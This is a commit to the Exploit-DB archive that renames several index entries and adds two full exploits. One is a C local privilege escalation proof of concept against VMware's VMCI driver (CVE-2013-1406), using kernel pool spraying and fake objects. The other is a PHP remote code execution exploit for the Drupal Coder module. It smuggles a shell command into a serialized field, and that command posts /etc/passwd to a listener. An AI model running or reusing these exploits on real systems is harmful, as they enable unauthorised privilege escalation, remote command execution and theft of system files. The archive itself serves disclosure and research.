DB: 2016-08-08

2 new exploits VMWare OVF Tools - Format String (1) VMware OVF Tools - Format String (1) VMWare OVF Tools - Format String (2) VMware OVF Tools - Format String (2) VMWare - Setuid vmware-mount Unsafe popen(3) VMware - Setuid vmware-mount Unsafe popen(3) Drupal Module Coder < 7.x-1.3 / 7.x-2.6 - Remote Code Execution Exploit (SA-CONTRIB-2016-039) VMware Virtual Machine Communication Interface (VMCI) vmci.sys - Proof of Concept VMWare - Setuid vmware-mount Popen lsb_release Privilege Escalation (VMSA-2013-0010) VMware - Setuid vmware-mount Popen lsb_release Privilege Escalation (VMSA-2013-0010) ntop 2.3 <= 2.5 - Multiple Vulnerabilities ntop/nbox 2.3 <= 2.5 - Multiple Vulnerabilities NUUO NVRmini 2 3.0.8 - ShellShock Remote Code Execution NUUO NVRmini 2 3.0.8 - (ShellShock) Remote Code Execution
2016-08-08 05:05:38 +00:00 · 2016-08-08 05:05:38 +00:00 · dac3d3dad6
commit dac3d3dad6
parent e161127711
3 changed files with 509 additions and 6 deletions
--- a/files.csv
+++ b/files.csv
@ -21617,7 +21617,7 @@ id,file,description,date,author,platform,type,port
 24441,platforms/hardware/webapps/24441.txt,"Netgear SPH200D - Multiple Vulnerabilities",2013-01-31,m-1-k-3,hardware,webapps,0
 24508,platforms/php/webapps/24508.txt,"Scripts Genie Gallery Personals (gallery.php L param) - SQL Injection",2013-02-17,3spi0n,php,webapps,0
 24433,platforms/php/webapps/24433.txt,"php weby directory software 1.2 - Multiple Vulnerabilities",2013-01-28,AkaStep,php,webapps,0
-24460,platforms/windows/remote/24460.rb,"VMWare OVF Tools - Format String (1)",2013-02-06,Metasploit,windows,remote,0
+24460,platforms/windows/remote/24460.rb,"VMware OVF Tools - Format String (1)",2013-02-06,Metasploit,windows,remote,0
 24434,platforms/multiple/remote/24434.rb,"Ruby on Rails JSON Processor YAML Deserialization Code Execution",2013-01-29,Metasploit,multiple,remote,0
 24435,platforms/hardware/webapps/24435.txt,"Fortinet FortiMail 400 IBE - Multiple Vulnerabilities",2013-01-29,Vulnerability-Lab,hardware,webapps,0
 24436,platforms/php/webapps/24436.txt,"Kohana Framework 2.3.3 - Directory Traversal",2013-01-29,Vulnerability-Lab,php,webapps,0
@ -21640,7 +21640,7 @@ id,file,description,date,author,platform,type,port
 24457,platforms/php/webapps/24457.txt,"Glossword 1.8.3 - SQL Injection",2013-02-05,AkaStep,php,webapps,0
 24458,platforms/linux/local/24458.txt,"Oracle Automated Service Manager 1.3 - Installation Local Privilege Escalation",2013-02-05,"Larry W. Cashdollar",linux,local,0
 24459,platforms/linux/local/24459.sh,"Linux Kernel 2.6.32-5 (Debian 6.0.5) - /dev/ptmx Key Stroke Timing Local Disclosure",2013-02-05,vladz,linux,local,0
-24461,platforms/windows/remote/24461.rb,"VMWare OVF Tools - Format String (2)",2013-02-12,Metasploit,windows,remote,0
+24461,platforms/windows/remote/24461.rb,"VMware OVF Tools - Format String (2)",2013-02-12,Metasploit,windows,remote,0
 24462,platforms/php/webapps/24462.txt,"Hiverr 2.2 - Multiple Vulnerabilities",2013-02-06,xStarCode,php,webapps,0
 24463,platforms/windows/dos/24463.txt,"Cool PDF Reader 3.0.2.256 - Buffer Overflow",2013-02-07,"Chris Gabriel",windows,dos,0
 24464,platforms/hardware/webapps/24464.txt,"Netgear DGN1000B - Multiple Vulnerabilities",2013-02-07,m-1-k-3,hardware,webapps,0
@ -25037,7 +25037,7 @@ id,file,description,date,author,platform,type,port
 27996,platforms/php/webapps/27996.txt,"Open Business Management 1.0.3 pl1 user_index.php tf_lastname Parameter XSS",2006-06-07,r0t,php,webapps,0
 27997,platforms/php/webapps/27997.txt,"Open Business Management 1.0.3 pl1 list_index.php Multiple Parameter XSS",2006-06-07,r0t,php,webapps,0
 28394,platforms/php/webapps/28394.pl,"FusionPHP Fusion News 3.7 Index.php Remote File Inclusion",2006-08-16,O.U.T.L.A.W,php,webapps,0
-27938,platforms/linux/local/27938.rb,"VMWare - Setuid vmware-mount Unsafe popen(3)",2013-08-29,Metasploit,linux,local,0
+27938,platforms/linux/local/27938.rb,"VMware - Setuid vmware-mount Unsafe popen(3)",2013-08-29,Metasploit,linux,local,0
 27939,platforms/windows/remote/27939.rb,"HP LoadRunner - lrFileIOService ActiveX Remote Code Execution",2013-08-29,Metasploit,windows,remote,0
 27940,platforms/windows/remote/27940.rb,"Firefox XMLSerializer Use After Free",2013-08-29,Metasploit,windows,remote,0
 27941,platforms/php/remote/27941.rb,"SPIP connect Parameter PHP Injection",2013-08-29,Metasploit,php,remote,0
@ -36305,6 +36305,7 @@ id,file,description,date,author,platform,type,port
 40140,platforms/php/webapps/40140.txt,"TeamPass Passwords Management System 2.1.26 - Arbitrary File Download",2016-07-21,"Hasan Emre Ozer",php,webapps,80
 40141,platforms/bsd/local/40141.c,"mail.local(8) (NetBSD) - Local Root Exploit (NetBSD-SA2016-006)",2016-07-21,akat1,bsd,local,0
 40142,platforms/php/remote/40142.php,"Apache 2.4.7 + PHP 7.0.2 - openssl_seal() Uninitialized Memory Code Execution",2016-02-01,akat1,php,remote,0
 40144,platforms/php/remote/40144.php,"Drupal Module Coder < 7.x-1.3 / 7.x-2.6 - Remote Code Execution Exploit (SA-CONTRIB-2016-039)",2016-07-23,Raz0r,php,remote,0
 40146,platforms/linux/remote/40146.rb,"Barracuda Web App Firewall 8.0.1.007/Load Balancer 5.4.0.004 - Remote Command Execution (Metasploit)",2016-07-25,xort,linux,remote,8000
 40147,platforms/linux/remote/40147.rb,"Barracuda Spam & Virus Firewall 5.1.3.007 - Remote Command Execution (Metasploit)",2016-07-25,xort,linux,remote,8000
 40148,platforms/windows/local/40148.py,"MediaCoder 0.8.43.5852 - .m3u SEH Exploit",2016-07-25,"Karn Ganeshen",windows,local,0
@ -36322,10 +36323,11 @@ id,file,description,date,author,platform,type,port
 40161,platforms/java/webapps/40161.txt,"Micro Focus Filr 2 2.0.0.421_ Filr 1.2 1.2.0.846 - Multiple Vulnerabilities",2016-07-25,"SEC Consult",java,webapps,9443
 40162,platforms/linux/remote/40162.rb,"Barracuda Web App Firewall 8.0.1.007/Load Balancer 5.4.0.004 - Post Auth Remote Root Exploit (Metasploit)",2016-07-26,xort,linux,remote,8000
 40163,platforms/php/webapps/40163.txt,"PHP File Vault 0.9 - Directory Traversal",2016-07-26,N_A,php,webapps,80
 40164,platforms/multiple/local/40164.c,"VMware Virtual Machine Communication Interface (VMCI) vmci.sys - Proof of Concept",2013-03-06,"Artem Shishkin",multiple,local,0
 40165,platforms/cgi/webapps/40165.txt,"Iris ID IrisAccess ICU 7000-2 - Multiple Vulnerabilities",2016-07-26,LiquidWorm,cgi,webapps,80
 40166,platforms/cgi/webapps/40166.txt,"Iris ID IrisAccess ICU 7000-2 - Remote Root Command Execution",2016-07-26,LiquidWorm,cgi,webapps,80
 40167,platforms/linux/remote/40167.txt,"Iris ID IrisAccess iCAM4000/iCAM7000 - Hardcoded Credentials Remote Shell Access",2016-07-26,LiquidWorm,linux,remote,23
-40169,platforms/linux/local/40169.txt,"VMWare - Setuid vmware-mount Popen lsb_release Privilege Escalation (VMSA-2013-0010)",2013-08-22,"Tavis Ormandy",linux,local,0
+40169,platforms/linux/local/40169.txt,"VMware - Setuid vmware-mount Popen lsb_release Privilege Escalation (VMSA-2013-0010)",2013-08-22,"Tavis Ormandy",linux,local,0
 40170,platforms/python/remote/40170.rb,"Centreon 2.5.3 - Web Useralias Command Execution (Metasploit)",2016-07-27,Metasploit,python,remote,80
 40172,platforms/windows/local/40172.py,"VUPlayer 2.49 - (.pls) Stack Buffer Overflow (DEP Bypass)",2016-07-29,vportal,windows,local,0
 40173,platforms/windows/local/40173.txt,"mySCADAPro 7 - Local Privilege Escalation",2016-07-29,"Karn Ganeshen",windows,local,0
@ -36349,7 +36351,7 @@ id,file,description,date,author,platform,type,port
 40198,platforms/multiple/dos/40198.txt,"Wireshark 2.0.0 to 2.0.4_ 1.12.0 to 1.12.12 - WSP Dissector Denial of Service",2016-08-03,"Chris Benedict",multiple,dos,0
 40199,platforms/multiple/dos/40199.txt,"Wireshark 2.0.0 to 2.0.4_ 1.12.0 to 1.12.12 - RLC Dissector Denial of Service",2016-08-03,"Antti Levomäki",multiple,dos,0
 40200,platforms/hardware/remote/40200.txt,"NUUO NVRmini2 / NVRsolo / Crystal Devices and NETGEAR ReadyNAS Surveillance Application - Multiple Vulnerabilities",2016-08-05,"Pedro Ribeiro",hardware,remote,0
-40201,platforms/linux/remote/40201.txt,"ntop 2.3 <= 2.5 - Multiple Vulnerabilities",2016-08-05,"Javier Marcos",linux,remote,0
+40201,platforms/linux/remote/40201.txt,"ntop/nbox 2.3 <= 2.5 - Multiple Vulnerabilities",2016-08-05,"Javier Marcos",linux,remote,0
 40202,platforms/php/webapps/40202.txt,"Subrion CMS 4.0.5 - SQL Injection",2016-08-05,Vulnerability-Lab,php,webapps,80
 40203,platforms/linux/local/40203.py,"zFTP Client 20061220 - (Connection Name) Local Buffer Overflow",2016-08-05,"Juan Sacco",linux,local,0
 40204,platforms/php/webapps/40204.txt,"PHP Power Browse 1.2 - Directory Traversal",2016-08-05,"Manuel Mancera",php,webapps,80
@ -36361,6 +36363,6 @@ id,file,description,date,author,platform,type,port
 40210,platforms/php/webapps/40210.html,"NUUO NVRmini 2 3.0.8 - (Add Admin) CSRF",2016-08-06,LiquidWorm,php,webapps,80
 40211,platforms/php/webapps/40211.txt,"NUUO NVRmini 2 3.0.8 - Local File Disclosure",2016-08-06,LiquidWorm,php,webapps,80
 40212,platforms/php/webapps/40212.txt,"NUUO NVRmini 2 3.0.8 - Multiple OS Command Injection",2016-08-06,LiquidWorm,php,webapps,80
-40213,platforms/cgi/webapps/40213.txt,"NUUO NVRmini 2 3.0.8 - ShellShock Remote Code Execution",2016-08-06,LiquidWorm,cgi,webapps,80
+40213,platforms/cgi/webapps/40213.txt,"NUUO NVRmini 2 3.0.8 - (ShellShock) Remote Code Execution",2016-08-06,LiquidWorm,cgi,webapps,80
 40214,platforms/php/webapps/40214.txt,"NUUO NVRmini 2 3.0.8 - Arbitrary File Deletion",2016-08-06,LiquidWorm,php,webapps,80
 40215,platforms/php/webapps/40215.txt,"NUUO NVRmini 2 3.0.8 - (strong_user.php) Backdoor Remote Shell Access",2016-08-06,LiquidWorm,php,webapps,80
--- a/platforms/multiple/local/40164.c
+++ b/platforms/multiple/local/40164.c
@ -0,0 +1,472 @@
 /*
    CVE-2013-1406 exploitation PoC
    by Artem Shishkin,
    Positive Research,
    Positive Technologies,
    02-2013
 */
 void __stdcall FireShell(DWORD dwSomeParam)
 {
    EscalatePrivileges(hProcessToElevate);
    // Equate the stack and quit the cycle
 #ifndef _AMD64_
    __asm
    {
        pop ebx
        pop edi
        push 0xFFFFFFF8
        push 0xA010043
    }
 #endif
 }
 HANDLE LookupObjectHandle(PSYSTEM_HANDLE_INFORMATION_EX pHandleTable, PVOID pObjectAddr, DWORD dwProcessID = 0)
 {
    HANDLE            hResult = 0;
    DWORD            dwLookupProcessID = dwProcessID;
    if (pHandleTable == NULL)
    {
        printf("Ain't funny\n");
        return 0;
    }
    if (dwLookupProcessID == 0)
    {
        dwLookupProcessID = GetCurrentProcessId();
    }
    for (unsigned int i = 0; i < pHandleTable->NumberOfHandles; i++)
    {
        if ((pHandleTable->Handles[i].UniqueProcessId == (HANDLE)dwLookupProcessID) && (pHandleTable->Handles[i].Object == pObjectAddr))
        {
            hResult = pHandleTable->Handles[i].HandleValue;
            break;
        }
    }
    return hResult;
 }
 PVOID LookupObjectAddress(PSYSTEM_HANDLE_INFORMATION_EX pHandleTable, HANDLE hObject, DWORD dwProcessID = 0)
 {
    PVOID    pResult = 0;
    DWORD    dwLookupProcessID = dwProcessID;
    if (pHandleTable == NULL)
    {
        printf("Ain't funny\n");
        return 0;
    }
    if (dwLookupProcessID == 0)
    {
        dwLookupProcessID = GetCurrentProcessId();
    }
    for (unsigned int i = 0; i < pHandleTable->NumberOfHandles; i++)
    {
        if ((pHandleTable->Handles[i].UniqueProcessId == (HANDLE)dwLookupProcessID) && (pHandleTable->Handles[i].HandleValue == hObject))
        {
            pResult = (HANDLE)pHandleTable->Handles[i].Object;
            break;
        }
    }
    return pResult;
 }
 void CloseTableHandle(PSYSTEM_HANDLE_INFORMATION_EX pHandleTable, HANDLE hObject, DWORD dwProcessID = 0)
 {
    DWORD    dwLookupProcessID = dwProcessID;
    if (pHandleTable == NULL)
    {
        printf("Ain't funny\n");
        return;
    }
    if (dwLookupProcessID == 0)
    {
        dwLookupProcessID = GetCurrentProcessId();
    }
    for (unsigned int i = 0; i < pHandleTable->NumberOfHandles; i++)
    {
        if ((pHandleTable->Handles[i].UniqueProcessId == (HANDLE)dwLookupProcessID) && (pHandleTable->Handles[i].HandleValue == hObject))
        {
            pHandleTable->Handles[i].Object = NULL;
            pHandleTable->Handles[i].HandleValue = NULL;
            break;
        }
    }
    return;
 }
 void PoolSpray()
 {
    // Init used native API function
    lpNtQuerySystemInformation NtQuerySystemInformation = (lpNtQuerySystemInformation)GetProcAddress(GetModuleHandle(L"ntdll.dll"), "NtQuerySystemInformation");
    if (NtQuerySystemInformation == NULL)
    {
        printf("Such a fail...\n");
        return;
    }
    // Determine object size
    // xp: 
    //const DWORD_PTR dwSemaphoreSize = 0x38;
    // 7:
    //const DWORD_PTR dwSemaphoreSize = 0x48;
    DWORD_PTR dwSemaphoreSize = 0;
    if (LOBYTE(GetVersion()) == 5)
    {
        dwSemaphoreSize = 0x38;
    }
    else if (LOBYTE(GetVersion()) == 6)
    {
        dwSemaphoreSize = 0x48;
    }
    unsigned int cycleCount = 0;
    while (cycleCount < 50000)
    {
        HANDLE hTemp = CreateSemaphore(NULL, 0, 3, NULL);
        if (hTemp == NULL)
        {
            break;
        }
        ++cycleCount;
    }
    printf("\t[+] Spawned lots of semaphores\n");
    printf("\t[.] Initing pool windows\n");
    Sleep(2000);
    DWORD dwNeeded = 4096;
    NTSTATUS status = 0xFFFFFFFF;
    PVOID pBuf = VirtualAlloc(NULL, 4096, MEM_COMMIT, PAGE_READWRITE);
    while (true)
    {
        status = NtQuerySystemInformation(SystemExtendedHandleInformation, pBuf, dwNeeded, NULL);
        if (status != STATUS_SUCCESS)
        {
            dwNeeded *= 2;
            VirtualFree(pBuf, 0, MEM_RELEASE);
            pBuf = VirtualAlloc(NULL, dwNeeded, MEM_COMMIT, PAGE_READWRITE);
        }
        else
        {
            break;
        }
    };
    HANDLE hHandlesToClose[0x30] = {0};
    DWORD dwCurPID = GetCurrentProcessId();
    PSYSTEM_HANDLE_INFORMATION_EX pHandleTable = (PSYSTEM_HANDLE_INFORMATION_EX)pBuf;
    for (ULONG i = 0; i < pHandleTable->NumberOfHandles; i++)
    {
        if (pHandleTable->Handles[i].UniqueProcessId == (HANDLE)dwCurPID)
        {
            DWORD_PTR    dwTestObjAddr = (DWORD_PTR)pHandleTable->Handles[i].Object;
            DWORD_PTR    dwTestHandleVal = (DWORD_PTR)pHandleTable->Handles[i].HandleValue;
            DWORD_PTR    dwWindowAddress = 0;
            bool        bPoolWindowFound = false;
            UINT iObjectsNeeded = 0;
            // Needed window size is vmci packet pool chunk size (0x218) divided by
            // Semaphore pool chunk size (dwSemaphoreSize)
            iObjectsNeeded = (0x218 / dwSemaphoreSize) + ((0x218 % dwSemaphoreSize != 0) ? 1 : 0);
            if (
                    // Not on a page boundary
                    ((dwTestObjAddr & 0xFFF) != 0) 
                    && 
                    // Doesn't cross page boundary
                    (((dwTestObjAddr + 0x300) & 0xF000) == (dwTestObjAddr & 0xF000)) 
                )
            {
                // Check previous object for being our semaphore
                DWORD_PTR dwPrevObject = dwTestObjAddr - dwSemaphoreSize;
                if (LookupObjectHandle(pHandleTable, (PVOID)dwPrevObject) == NULL)
                {
                    continue;
                }
                for (unsigned int j = 1; j < iObjectsNeeded; j++)
                {
                    DWORD_PTR dwNextTestAddr = dwTestObjAddr + (j * dwSemaphoreSize);
                    HANDLE hLookedUp = LookupObjectHandle(pHandleTable, (PVOID)dwNextTestAddr);
                    //printf("dwTestObjPtr = %08X, dwTestObjHandle = %08X\n", dwTestObjAddr, dwTestHandleVal);
                    //printf("\tdwTestNeighbour = %08X\n", dwNextTestAddr);
                    //printf("\tLooked up handle = %08X\n", hLookedUp);
                    if (hLookedUp != NULL)
                    {
                        hHandlesToClose[j] = hLookedUp;
                        if (j == iObjectsNeeded - 1)
                        {
                            // Now test the following object
                            dwNextTestAddr = dwTestObjAddr + ((j + 1) * dwSemaphoreSize);
                            if (LookupObjectHandle(pHandleTable, (PVOID)dwNextTestAddr) != NULL)
                            {
                                hHandlesToClose[0] = (HANDLE)dwTestHandleVal;
                                bPoolWindowFound = true;
                                dwWindowAddress = dwTestObjAddr;
                                // Close handles to create a memory window
                                for (int k = 0; k < iObjectsNeeded; k++)
                                {
                                    if (hHandlesToClose[k] != NULL)
                                    {
                                        CloseHandle(hHandlesToClose[k]);
                                        CloseTableHandle(pHandleTable, hHandlesToClose[k]);
                                    }
                                }
                            }
                            else
                            {
                                memset(hHandlesToClose, 0, sizeof(hHandlesToClose));
                                break;
                            }
                        }
                    }
                    else
                    {
                        memset(hHandlesToClose, 0, sizeof(hHandlesToClose));
                        break;
                    }
                }
                if (bPoolWindowFound)
                {
                    printf("\t[+] Window found at %08X!\n", dwWindowAddress);
                }
            }
        }
    }
    VirtualFree(pBuf, 0, MEM_RELEASE);
    return;
 }
 void InitFakeBuf(PVOID pBuf, DWORD dwSize)
 {
    if (pBuf != NULL)
    {
        RtlFillMemory(pBuf, dwSize, 0x11);
    }
    return;
 }
 void PlaceFakeObjects(PVOID pBuf, DWORD dwSize, DWORD dwStep)
 {
    /*
        Previous chunk size will be always 0x43 and the pool index will be 0, so the last bytes will be 0x0043
        So, for every 0xXXXX0043 address we must suffice the following conditions:
        lea        edx, [eax+38h]
        lock    xadd [edx], ecx
        cmp        ecx, 1
        Some sort of lock at [addr + 38] must be equal to 1. And
        call    dword ptr [eax+0ACh]
        The call site is located at [addr + 0xAC]
        Also fake the object to be dereferenced at [addr + 0x100]
    */
    if (pBuf != NULL)
    {
        for (PUCHAR iAddr = (PUCHAR)pBuf + 0x43; iAddr < (PUCHAR)pBuf + dwSize; iAddr = iAddr + dwStep)
        {
            PDWORD pLock = (PDWORD)(iAddr + 0x38);
            PDWORD_PTR pCallMeMayBe = (PDWORD_PTR)(iAddr + 0xAC);
            PDWORD_PTR pFakeDerefObj = (PDWORD_PTR)(iAddr + 0x100);
            *pLock = 1;
            *pCallMeMayBe = (DWORD_PTR)FireShell;
            *pFakeDerefObj = (DWORD_PTR)pBuf + 0x1000;
        }
    }
    return;
 }
 void PenetrateVMCI()
 {
    /*
        VMware Security Advisory
        Advisory ID:    VMSA-2013-0002
        Synopsis:    VMware ESX, Workstation, Fusion, and View VMCI privilege escalation vulnerability
        Issue date:    2013-02-07
        Updated on:    2013-02-07 (initial advisory)
        CVE numbers:    CVE-2013-1406
    */
    DWORD dwPidToElevate = 0;
    HANDLE hSuspThread = NULL;
    bool bXP = (LOBYTE(GetVersion()) == 5);
    bool b7 = ((LOBYTE(GetVersion()) == 6) && (HIBYTE(LOWORD(GetVersion())) == 1));
    bool b8 = ((LOBYTE(GetVersion()) == 6) && (HIBYTE(LOWORD(GetVersion())) == 2));
    if (!InitKernelFuncs())
    {
        printf("[-] Like I don't know where the shellcode functions are\n");
        return;
    }
    if (bXP)
    {
        printf("[?] Who do we want to elevate?\n");
        scanf_s("%d", &dwPidToElevate);
        hProcessToElevate = OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, dwPidToElevate);
        if (hProcessToElevate == NULL)
        {
            printf("[-] This process doesn't want to be elevated\n");
            return;
        }
    }
    if (b7 || b8)
    {
        // We are unable to change an active process token on-the-fly,
        // so we create a custom shell suspended (Ionescu hack)
        STARTUPINFO si = {0};
        PROCESS_INFORMATION pi = {0};
        si.wShowWindow = TRUE;
        WCHAR cmdPath[MAX_PATH] = {0};
        GetSystemDirectory(cmdPath, MAX_PATH);
        wcscat_s(cmdPath, MAX_PATH, L"\\cmd.exe");
        if (CreateProcess(cmdPath, L"", NULL, NULL, FALSE, CREATE_SUSPENDED | CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi) == TRUE)
        {
            hProcessToElevate = pi.hProcess;
            hSuspThread = pi.hThread;
        }
    }
    HANDLE hVMCIDevice = CreateFile(L"\\\\.\\vmci", GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, NULL, NULL);
    if (hVMCIDevice != INVALID_HANDLE_VALUE)
    {
        UCHAR BadBuff[0x624] = {0};
        UCHAR retBuf[0x624] = {0};
        DWORD dwRet = 0;
        printf("[+] VMCI service found running\n");
        PVM_REQUEST pVmReq = (PVM_REQUEST)BadBuff;
        pVmReq->Header.RequestSize = 0xFFFFFFF0;
        PVOID pShellSprayBufStd = NULL;
        PVOID pShellSprayBufQtd = NULL;
        PVOID pShellSprayBufStd7 = NULL;
        PVOID pShellSprayBufQtd7 = NULL;
        PVOID pShellSprayBufChk8 = NULL;
        if ((b7) || (bXP) || (b8))
        {
            /*
                Significant bits of a PoolType of a chunk define the following regions:
                0x0A000000 - 0x0BFFFFFF - Standard chunk
                0x1A000000 - 0x1BFFFFFF - Quoted chunk
                0x0 - 0xFFFFFFFF - Free chunk - no idea
                Addon for Windows 7:
                Since PoolType flags have changed, and "In use flag" is now 0x2,
                define an additional region for Win7:
                0x04000000 - 0x06000000 - Standard chunk
                0x14000000 - 0x16000000 - Quoted chunk
            */
            pShellSprayBufStd = VirtualAlloc((LPVOID)0xA000000, 0x2000000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
            pShellSprayBufQtd = VirtualAlloc((LPVOID)0x1A000000, 0x2000000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
            pShellSprayBufStd7 = VirtualAlloc((LPVOID)0x4000000, 0x2000000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
            pShellSprayBufQtd7 = VirtualAlloc((LPVOID)0x14000000, 0x2000000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
            if ((pShellSprayBufQtd == NULL) || (pShellSprayBufQtd == NULL) || (pShellSprayBufQtd == NULL) || (pShellSprayBufQtd == NULL))
            {
                printf("\t[-] Unable to map the needed memory regions, please try running the app again\n");
                CloseHandle(hVMCIDevice);
                return;
            }
            InitFakeBuf(pShellSprayBufStd, 0x2000000);
            InitFakeBuf(pShellSprayBufQtd, 0x2000000);
            InitFakeBuf(pShellSprayBufStd7, 0x2000000);
            InitFakeBuf(pShellSprayBufQtd7, 0x2000000);
            PlaceFakeObjects(pShellSprayBufStd, 0x2000000, 0x10000);
            PlaceFakeObjects(pShellSprayBufQtd, 0x2000000, 0x10000);
            PlaceFakeObjects(pShellSprayBufStd7, 0x2000000, 0x10000);
            PlaceFakeObjects(pShellSprayBufQtd7, 0x2000000, 0x10000);
            if (SetThreadPriority(GetCurrentThread(), THREAD_PRIORITY_TIME_CRITICAL) == FALSE)
            {
                SetThreadPriority(GetCurrentThread(), THREAD_PRIORITY_HIGHEST);
            }
            PoolSpray();
            if (DeviceIoControl(hVMCIDevice, 0x8103208C, BadBuff, sizeof(BadBuff), retBuf, sizeof(retBuf), &dwRet, NULL) == TRUE)
            {
                printf("\t[!] If you don't see any BSOD, you're successful\n");
                if (b7 || b8)
                {
                    ResumeThread(hSuspThread);
                }
            }
            else
            {
                printf("[-] Not this time %d\n", GetLastError());
            }
            if (pShellSprayBufStd != NULL)
            {
                VirtualFree(pShellSprayBufStd, 0, MEM_RELEASE);
            }
            if (pShellSprayBufQtd != NULL)
            {
                VirtualFree(pShellSprayBufQtd, 0, MEM_RELEASE);
            }
        }
        SetThreadPriority(GetCurrentThread(), THREAD_PRIORITY_NORMAL);
        CloseHandle(hVMCIDevice);
    }
    else
    {
        printf("[-] Like I don't see vmware here\n");
    }
    CloseHandle(hProcessToElevate);
    return;
 }
--- a/platforms/php/remote/40144.php
+++ b/platforms/php/remote/40144.php
@ -0,0 +1,29 @@
 <?php
 # Drupal module Coder Remote Code Execution (SA-CONTRIB-2016-039)
 # https://www.drupal.org/node/2765575
 # by Raz0r (http://raz0r.name)
 #
 # E-DB Note: Source ~ https://gist.github.com/Raz0r/7b7501cb53db70e7d60819f8eb9fcef5
 $cmd = "curl -XPOST http://localhost:4444 -d @/etc/passwd";
 $host = "http://localhost:81/drupal-7.12/";
 $a = array(
    "upgrades" => array(
        "coder_upgrade" => array(
            "module" => "color",
            "files" => array("color.module")
        )
    ),
    "extensions" => array("module"),
    "items" => array (array("old_dir"=>"test; $cmd;", "new_dir"=>"test")),
    "paths" => array(
        "modules_base" => "../../../",
        "files_base" => "../../../../sites/default/files"
    )
 );
 $payload = serialize($a);
 file_get_contents($host . "/modules/coder/coder_upgrade/scripts/coder_upgrade.run.php?file=data://text/plain;base64," . base64_encode($payload));
 ?>